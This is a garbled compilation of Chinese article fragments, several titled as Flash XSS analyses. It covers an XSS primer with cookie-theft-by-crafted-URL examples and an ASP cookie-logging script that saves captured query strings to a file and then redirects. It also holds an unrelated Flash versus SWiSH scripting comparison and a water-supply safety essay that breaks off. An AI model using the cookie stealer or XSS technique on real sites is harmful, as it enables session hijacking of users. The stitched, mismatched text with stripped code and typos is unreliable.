如果你在进行注入测试时使用这种方法就不能有这样多的换行，必须把它们合为一行，每个语句中间用空格符隔开。

我来给大家一个思路吧：

篇11：若干flash xss漏洞分析脚本安全

最常见的跨站脚本的方法，输入

以及它的各种变体

实体

%3Cscript%3Ealert(1)%3C/script%3E URL编码

或者

;等

如果提交后，页面弹出警告框，则该页面存在xss漏洞

*反射型xss

通俗来讲，即使输入一段代码，既可以看到代码实际的效果，而非原程序的效果

如：一段代码

//location.search返回url?开始的部分

当输入以下url

”127.0.0.1/attrck.html?search=222“

页面将显示：?search=222 ；但url中如果输入

/?search=

则页面的实际代码为：

document.write（?search=）;

将弹出警告框，即代码被执行了，而并非页面原来显示?后字符串的效果

可以使用伪造后的url获取用户cookie

如，在示例1中加入document.cookie=(”name=123“);，设置cookie，然后构造url如下，实现将localhost域的cookie传递到并进行搜索

 

127.0.0.1/attrck.html?search=

因为cookie是禁止跨域访问的，但伪造的url，浏览器会认为是还是localhost的域

*保存型xss

是指将恶意代码保存到服务器，比如发布一篇包含恶意代码，其他用户浏览时将执行恶意脚本

*基于dom的xss

严格来说该xss也属于反射性，本文的例子其实也是dom based，是指修改页面的dom对象模型，从而达成攻击，比如页面使用了document.writedocument.writelninnerhtml等dom方法有可能引起dom based xss

篇12：若干flash xss漏洞分析脚本安全

dim fs,log,logname,event

logname=“cookie_”& now & “.txt”

logname=replace(logname,“ ”,“_”)

logname=replace(logname,“-”,“_”)

logname=replace(logname,“:”,“.”)

logname=server.mappath(logname)

set event=request.servervariables(“QURYU_SRTING”)

set fs=server.createobject(“scripts.filesystemobject”)

log=fs.createtextfile(logname)

log.writeline event

log.close

set fs=nothing

reponse.redirect(“www.wolfexp.net/forum/index.php”)

篇13：若干flash xss漏洞分析脚本安全

利用Adobe公司的Flash工具软件开发制作Flash作品(包括动画、演示文稿、网站、游戏、应用程序等等)是顺理成章的,可谓正宗。当前Flash的最流行版本为Flash CS3(最新版本Flash CS4刚刚于2008年11月15日正式发布,本文暂不做论述)。但能开发制作Flash作品的工具软件还有许多,其中最具代表性是SWi SHzone公司的SWi SH工具软件。当前SWi SH的最新版本为SWi SHmax2(版本4)。SWi SH在绝大多数的功能上都可以替代Flash,而且使用操作更加简单方便。特别是它内置有350多种效果,使用户能以极其简单操作,制作出非常精彩的Flash作品。

Flash拥有功能强大的脚本语言Action Script,Flash CS3的脚本语言升级为Action Script 3.0,同时兼容Action Script 2.0。与Flash相似,SWi SH也拥有功能强大的脚本语言,而且与Action Script基本相同。SWi SHmax2的脚本语言基本与Action Script 2.0等同。下面,我们就SWi SHmax2的脚本语言与Flash CS3的脚本语言进行对比分析。

2 两种脚本语言基本相同,绝大部分内容完全一致

1)Action Script遵循ECMA-262标准,属于ECMAScript,是面向对象的程序设计(OOP)语言,其语法规则和风格非常接近于Java Script。SWi SH产生来源于Flash,SWi SH的脚本语言也来源于Flash的脚本语言Action Script,也就是说,SWi SH脚本语言的语法规则和风格也非常接近于Java Script。

2)象一般面向对象的编程(OOP)语言一样,两种脚本语言都具有对象、实例、类成员和接口。都具有继承性、封装性、多态性。

3)两种脚本语言都主要面向“帧(Frame)”对象和“影片剪辑(Movie Clip)”对象编程。

4)在Flash和SWi SH编程过程中都可调用外部脚本文件,所使用的方法一样,通过#include语句调用。

5)两种脚本语言的语法规则、保留字、操作符、函数、语句、对象、类等等基本相同。

6)Flash和SWi SH编写脚本的方式方法基本一致。Flash里有动作面板和编程助手,SWi SHmax2里有完全相似的脚本面板和编程助手(协助面板)。两者编程的基本方法都是通过面板添加脚本,甚至用户可以在完全不懂脚本语言的情况下编写脚本。也可以在专家模式下直接在脚本窗口输入脚本代码。

3 SWi SH脚本语言相比Flash脚本语言也有创新特点

SWi SH和Flash之间有版本对应关系,SWi SH落后于Flash的版本。SWi SHmax2对应于Flash MX,落后Flash CS3三个版本。SWi SHmax2脚本语言与Flash CS3脚本语言本身就有版本上的差异。

SWi SHmax2之前版本明确称其脚本语言为SWi SHScript,SWi SHmax2没有明确其脚本语言的名称,但在它的脚本行中却有<%SWISHSCRIPT%>的标识,并且明确称其脚本语言类似于Action Script。虽然,SWi SHmax2脚本语言整体上弱于Flash CS3的脚本语言,但它也许多创新的特点,有的甚至是对Action Script的扩展与增强。主要表现在以下方面:

1)SWi SHmax2的脚本语言的创新特点首先表现在与其之前版本脚本语言的进步。如:以前版本的SWi SH假设用到没有定义过的变量,则会出现不可预知的问题,SWi SHmax2则能给出一个错误信息,如:"cannot find_load XXXXXXXX".这种情况常在从一个swf文件调用另一个swf文件时出现。

2)eval()函数的使用,以前SWi SH脚本中可以简化为:(objname)._x,现在SWi SHmax2脚本中要严格为:eval(objname)._x。

3)对保留字的限制与输出的级别无关,例如:Date在SWF5之后是保留字,如果使用了Date作为变量名,即使选择输出SWF4,也一样要显示错误。

4)编程对象进一步扩展,SWi SHmax2可以将简单的形状(Shape)和文本(Text)作为编程对象。这是对Action Script编程对象的扩展。

5)变量与字符串的转换不同:变量用来存储数字和字符串,根据脚本中上下文的意义,可以确定所存储的是数字还是字符串,并且是否需要转换。操作符+,<,<=,==,!=,=>和>,可以将数字、字符串或变量作为操作数。在SWF4中,变量被假设为数字,并且自动进行适当的转换。在SWF5及其之后中,都按真实的值存储变量。操作符“+”具有字符串优先性质,操作符“<,<=,==,!=,=>和>”则有数字优先性质,而操作符“add,lt,le,eq,ne,ge,gt”则假设变量是字符串并具有字符串优先性质。这些转换命令通过脚本中<%SWISHSCRIPT%>行来体现。

6)物理特性:SWi SHmax2的扩展了对象或影片剪辑的属性,增加了物理特性:速度、加速度和阻力。用户可以为对象或影片剪辑定义这些物理属性。这是SWi SH脚本语言的创新。

7)SWi SHmax2之前版本,都是使用“精灵(Sprite)”这一术语,SWi SHmax2开始使用与相同的术语———影片剪辑(Movie Clip),为了与以前的兼容性,在SWi SHmax2脚本中仍然支持以前的Sprite对象。但Sprite并不能支持所有的Movie Clip对象的属性和方法。

4 Flash脚本语言中有SWi SH无可比拟的功能特点

4.1 Action Script 3.0相对Action Script2.0的功能增强和提高

由于Flash CS3可以支持两种脚本语言,即:Action Script2.0和Action Script 3.0。所以Flash CS3脚本语言相对SWi SHmax2脚本语言优越性首先是Action Script 3.0相对Action Script2.0的功能增强和提高。Action Script 3.0的脚本编写功能超越了Action Script的早期版本。主要表现在:Action Script 3.0更方便创建拥有大型数据集和面向对象的可重用代码库的高度复杂应用程序。虽然Action Script 3.0对于在Adobe Flash Player 9中运行的内容并不是必需的,但它使用新型的虚拟机AVM2实现了性能的改善。ActionScript 3.0代码的执行速度可以比以前Action Script代码快10倍。

旧版本的Action Script虚拟机AVM1执行Action Script 1.0和Action Script 2.0代码。为了向后兼容现有内容和原先内容,Flash Player 9仍支持AVM1。

虽然Action Script3.0包含了Action Script 1.0和Action Script 2.0的许多类和功能,但Action Script 3.0在架构和概念上与之前的Action Script版本是有较大区别的。

Action Script 3.0的改进主要分为两部分,一是新增的核心语言功能,二是改进的Flash Player API能够更好地控制低级对象。

新增的核心语言功能包括:1)针对运行时的异常错误的情形比原来多;2)类型信息在运行时保留,并可用于多种目的;3)引入了密封类的概念;4)使闭包方法可以自动记起它的原始对象实例;5)实现了ECMAScript for XML(E4X);6)实现了对正则表达式的支持;7)命名空间使用统一资源标识符(URI);8)包含int和uint两种类型,改变了原来单一数值类型Number。

改进的Flash Player API功能包括:1)应用DOM3事件模型,提供了一种生成并处理事件消息的标准方法;2)新增用于访问Flash Player显示列表的API;3)处理动态数据和内容;4)各种API提供了对数据的低级访问;包含一个用于所有与文本相关的API的flash.text包。

4.2 滤镜的使用

Flash CS3在用户界面状态即可使用7个滤镜(投影,模糊,发光,斜角,渐变发光,渐变斜角,渐变颜色),另外2个滤镜(Convolution Filter,Displacement Map Filter)只有通过Action Script代码来使用。SWi SHmax2也使用SWF8(Flash Player8及之后的播放器所支持的滤镜)滤镜,也是9个,它们是:Bevel Filter,Blur Filter,Color Matrix Filter,Convolution Filter,Displacement Map Filter,Drop Shadow Filter,Glow Filter,Gradient Bevel Filter,Gradient Glow Filter。但是,它们的重要区别是:Flash CS3可以在普通文档编辑状态使用滤镜,也可以通过脚本代码使用滤镜。而SWi SHmax2只有通过脚本代码才能使用滤镜。

4.3 行为面板的使用

Flash CS3具有SWi SHmax2所没有的“行为”概念。所谓行为就是预定义的完全某些常见任务的脚本,用户可以方便地将行为添加到FLA文件中的对象。行为提供了的以下功能:帧的导航;加载外部SWF文件和JPEG文件;控制影片剪辑的层叠顺序;影片剪辑拖动等。

行为提供了使用户避免编写Action Script代码的便捷途径,也可帮助用户了解Action Script的工作方式。

行为仅对Action Script 2.0及更早版本可用,并且只有在“动作”面板中工作时才可用,在外部脚本文件中工作时则不可用。通常,用户可以在文档中选择一个触发对象(如影片剪辑或按钮),选择“行为”面板上的“增加”,然后选择行为。

5 扬长避短相互补充,灵活运用两种Flash工具

通过以上分析比较可以得出结论,单纯就脚本语言本身而言,Flash CS3明显比SWi SHmax2高一档次,整体功能优越,给代码开发者提供明显高于SWi SHmax2的编程空间。但就开发制作Flash作品而言,许多类型的Flash作品都对脚本的依赖性很低,许多作品几乎不需要脚本。而有着350种效果的SWi SHmax2完成这些任务能体现出更大的优越性,工作效率大大提高,而且,对于大多数情况下的脚本需求,SWi SHmax2的脚本语言和SWi SHmax2所提供的编程工具也方便快捷完成。

根据实际工作中开发制作Flash作品的具体类型特点不同,恰当选择使用开发工具无疑是最佳选择。Flash和SWi SH在使用方法的相似性和脚本语言的一致性,使同一用户使用两种工具进行开发不仅可能,而且易行,两个工具之间的转换是平滑的。

两种开发工具的综合运用可以有两种形式:一是同一开发者根据不同作品的不同特点而选择一种工具;二是同一开发者对同一个作品,根据其不同内容、环节、功能等特点的不同而采用不同的工具,即:同一个作品中有的部分是用Flash开发制作的,有的部分是用SWi SH开发制作的。虽然,两者的源文件不同(*.fla和*.swi),且不能互相导入,利用*.swf文件互相导入又完全损失了脚本信息。

同一个作品使用两种工具开发制作的方法是:首先,将适合SWi SH制作的部分用SWi SH制作出来,输出为*.swf文件;其次,使用SWF文件反编译工具(选用能反编译出脚本代码的版本)将*.swf文件反编译成*.fla文件;第三,将*.fla文件调入Flash完成适合Flash的部分。

参考文献

[1]2008 Adobe Systems Incorporated.Help Resource Center[EB/OL].http://www.adobe.com/support/documentation/.

篇14：城市供水水质安全管理的若干思考

关键词：供水水质　安全　管理

随着工业用水循环率的提高，节水措施和节水意识的提高，城市普遍存在供水总量需求下降的趋势，但是，中国是一个水资源短缺的国家，淡水资源总量多年平均为28000亿立方米，而且其时空分布极不均衡，造成我国的水问题很多，除了大的洪灾、旱灾外，在城市地区表现突出的是城市缺水和水污染。水资源的短缺造成社会经济的损害已经大于洪涝灾害，水资源的问题近年来也已经超过石油、能源等問题，被放在了经济社会发展的首位，特别是京、津、华北地区人均水资源量甚至低于极度缺水国家以色列的人均449立方米水量，水问题尤为突出，水质问题是水资源缺乏的主要型式，我们必须认识到当代的水资源首要问题就是水质普遍恶化的问题。在水质型污染严重的现状下，必须提高供水安全的意识和技术保障手段，所以《城市供水行业2010年技术进步发展规划》提出在21世纪最关键的前10年中，提高水质是主要目标。

目前，我国供水行业和国际上发达国家供水行业还存在较大的差距，比如，在供水水质指标A0C水平上，欧洲国家平均在10μg／L以下，而国内领先的深圳梅林水厂通过臭氧+活性碳吸附深度处理的出厂水AOC水平在37μg／L，而全国大多数出厂水AOC平均值在100μg／L左右；在消毒工艺特别是安全加氯工艺、供水管网和用户终端水处理设备上都存在较大的差距。

一.城市供水安全的概念

水是维系人类生存和社会经济发展的必需、不可替代的基本物质，饮水对维持生命非常重要。世界卫生组织认为，提供安全的饮水对身体健康是必不可少的，是基本的人权，是保障公众健康的重要组成部分。供水的安全性对于保障公众健康、生命安全和社会稳定具有重要作用，因此许多国家将供水安全纳入了国家安全的概念中。

供水安全(SafetyandSecurityofWaterSupply)包含两方面的含义：

一是，供水水质在使用中不应该给人体带来短期或长期的健康危害，即供水在自然属性上的安全性(WaterSafety)

二是，供水系统对遭受突发事故的威胁，包括，事故型供水水质危机有自然灾害、突发性水质污染事故、内源性水质恶化、水厂运行事故和破坏性水质危机有人为蓄意破坏或恐怖袭击时，具有良好的预防、保护、应急和恢复功能，即供水在社会意义上的安全性(WaterSecurity)

二，水质安全管理是政府职责

造成水质风险的因素很多，特别是我国水资源严重短缺的基本国情下，城市化进程加快，人口众多且密集居住，自然灾害频发，洪水泛滥和严重缺水会形成高浊水、突发卫生事件、水环境突然变化，内源性水质恶化，异嗅异味富营养化蓝藻和绿藻以及微囊藻毒素、水源地周围有毒有害化学品和生物制品事故性泄漏、水厂事故、净水技术和工艺的不足、人为破坏和恐怖袭击等，所以，政府对水质安全的监管十分重要，是政府的职能所在。事实上，我国从1993年就开始了对城市供水水质安全的政府监管，在城市公用事业领域中是最早实行政府监管的行业，而且重点就是对水质的监管。2005年底松花江污染造成哈尔滨近4007]人口停水四天的事故再次敲响了城市水质安全的警钟!

三，净水工艺技术改造措施

通过技术改造使净水工艺的每一环节在技术上处于经济合理的状态，是提高供水水质的重要环节。

1、适宜的混合条件

在常规处理中，短促而充分的混合是保证后续工艺处理效果的关键。生产运行中。当混合设施实际运行G值，有一定程度偏离合理值时，为改善混合条件，通常可采取以下措施：改造为机械混合池，效果较好的为水泵提升扩散管道混合器、机械搅拌混合器、水泵提升喷射混合器等；当有几组混凝沉淀池时，可比较停役其中一组后的综合效果，用两只管道混合器以适应不同水量。

2、充分、完善的絮凝过程

完善的絮凝是提高絮凝沉淀效果的首选，沉淀效果决定于絮凝体沉降特性和沉淀条件。水中脱稳颗粒碰撞的机率与GT成正比，用搅拌试验可求得当地水源最佳絮凝条件的GT组合。以同样静止沉淀条件，用搅拌试验来比较理想的混合、絮凝条件与生产絮凝池的差距，可以评估生产混合和絮凝设施的技术状态。

改造絮凝池是相对投入少而效果显著的技术和工程措施。改造内容主要是调整隔板间距(在机械絮凝池则是调整转速)或延长时间。折板絮凝池是维持较均匀G值的有效形式之一，机械絮凝设备是适应流量变化的合理形式。

3、合理的沉淀池改造

当絮凝体凝结良好，沉淀后水仍不能保证出水浊度的目标要求，则需研究沉淀池(或澄清池)改造的必要性。将斜管沉淀池改造为斜管沉淀／气浮池是一种投入少、见效快、效益好的实用技术。

首先，投资省、简单易行。整个沉淀池改造工程仅增加两面隔墙和一套压力溶气水制取及释气系统，斜管沉淀池的原有结构不变。

第二，处理效果好，滤池过滤周期明显延长。与常规气浮池相比，充分利用了池中原有的斜管，一方面提高了气浮分离效率，另一方面斜管上附着的生物膜在水中溶解氧较为充足的条件下，对于靴水中溶解性有机物有一定的辅助作用。

第三，运用合理、灵活。沉淀气浮两个功能互相切换方便，对原水水质变化的适应性强，使整个水厂的沉淀池负荷处在合理的状态。

4、严格最后把关性工序

对以浊度所指示的污染物而言，过滤是最后把关性工序。滤池冲洗后，滤料表层的含泥量宜小于1％。当滤层的浊度去除率较低，宜研究应用助滤剂和滤层改造的可行性。用模型滤池进行若干种滤层的过滤模型试验，求得适合本地条件的滤层和改造可能取得的效果，然后根据效益和投入分析确定改造方案。

此外，当常规处理后的水质不能满足供水水质要求时，则需增设相应的深度处理工艺。对经常超标项目，特别是有毒有害物质，要按超标项目的特点采取相应措施，可查阅该项目的溶解眭、分子量、能否生物降解、氧化和吸附特眭等资料，以便针对特性选择工艺，经过多次的试验，确定相应的工艺方案及主要参数。

四，完善配水系统及管理维护对策

水质标准是指用户龙头放出来的水质。在出厂水符合标准的基础上，为保证管网水符合标准，应做到：